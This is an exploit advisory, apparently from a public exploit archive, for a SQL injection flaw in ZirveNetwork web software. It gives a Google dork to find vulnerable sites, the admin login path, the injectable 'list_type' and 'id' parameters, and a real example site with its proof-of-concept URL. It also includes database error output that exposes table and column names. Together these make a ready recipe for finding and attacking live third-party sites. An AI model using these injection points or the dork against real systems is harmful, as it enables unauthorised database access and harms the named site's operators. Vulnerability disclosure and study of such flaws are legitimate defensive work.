#################################################################################################
# Exploit Title : ZirveNetwork SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : zirvenetwork.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''zirvenetwork.com''
# Admin Panel Path :
/admin/login.php
# Exploit :
/?page=main-page&list_type=[SQL Injection]
/?lang=tr&page=services&id=[SQL Injection]
#################################################################################################
# Example Site => platingayrimenkul.com.tr/?lang=tr&page=services&id=43%27 => [ Proof of Concept ] => archive.is/2QJQ6
# SQL Database Error =>
SQL_ERROR_TITLE
SQL_ERROR_CODE 0
SQL_QUERY select count(*) as count_row from t_advert where Visible='1' and 1\'='1'
SQL_ERROR You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\'='1'' at line 1SQL_ERROR_TITLE
SQL_ERROR_CODE 0
SQL_QUERY select t1.ID as advert_id, advert_title, t1.SquareMeter, t1.RentPrice, t1.RentCurrency,
t1.AdvertType, t2.Name as estate_status, t3.Name as estate_type, t4.Name as estate_city, t5.Name as estate_township,
t6.Name as estate_area, (select Images from t_advert_images where Visible='1' and ParentID=t1.ID order
by Seq asc LIMIT 0,1) as estate_images from t_advert t1 left join t_properties t2 on t1.EstateStatus=t2.ItemID and
t2.PageLang='Türkçe' and t2.PageType='EstateStatus' left join t_properties t3 on t1.EstateType=t3.ItemID and
t3.PageLang='Türkçe' and t3.PageType='EstateType' left join t_city t4 on t1.City=t4.ID left join t_township t5 on t1.
Township=t5.ID left join t_area t6 on t1.Area=t6.ID where t1.Visible='1' and t1.1\'='1' order by ADate desc limit 0,0
SQL_ERROR You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '\'='1' order by ADate desc limit 0,0' at line 21
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################